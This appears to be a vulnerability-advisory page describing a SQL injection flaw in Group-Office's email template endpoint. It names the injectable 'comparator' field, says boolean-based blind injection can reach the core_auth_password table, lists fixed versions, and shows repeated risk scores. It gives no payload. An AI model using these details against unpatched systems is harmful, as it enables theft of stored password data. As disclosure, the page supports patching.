Primary

Context

Group-Office SQL Injection Vulnerability in Email Template Selection Endpoint

Vulnerability

Patched

A SQL injection vulnerability has been identified in Group-Office, an enterprise CRM and groupware tool, affecting versions through 6.8.152, 26.0.7, and 25.0.85. The vulnerability arises in the email template selection endpoint, where the 'advancedQueryData' parameter's 'comparator' field is processed without proper validation. This flaw allows authenticated users to inject boolean-based SQL expressions, enabling blind exfiltration of sensitive data from the 'core_auth_password' table. Additionally, complex malicious queries could degrade database performance.

Impact

Exploitation of this vulnerability could lead to unauthorized access and exfiltration of sensitive password data from the core_auth_password table. While there is no direct impact on data integrity, such actions could disrupt database performance.

Remediation

Users can upgrade to Group-Office versions 26.0.8, 25.0.87, or 6.8.153 to address this vulnerability.

Added: Feb 27, 2026, 8:25 PM

Updated: Feb 27, 2026, 8:25 PM

Vulnerability Rating

Custom Algorithm

spread

3.1

impact

2.5

exploitability

6.3

remediation

7.7

relevance

3.3

threat

4.8

urgency

2.9

incentive

0.0

Our algorithm analyzes dozens of metrics to generate these 8 key vulnerability categories, which are then combined to calculate the overall risk score.

Vulnerability Rating

Custom Algorithm

spread

3.1

impact

2.5

exploitability

6.3

remediation

7.7

relevance

3.3

threat

4.8

urgency

2.9

incentive

0.0

Our algorithm analyzes dozens of metrics to generate these 8 key vulnerability categories, which are then combined to calculate the overall risk score.

Group-Office SQL Injection Vulnerability in Email Template Selection Endpoint

Vulnerability

Impact

Remediation

Affected Products

Intermesh Group-Office

CVSS Scores

References

Vulnerability Rating

Vulnerability Rating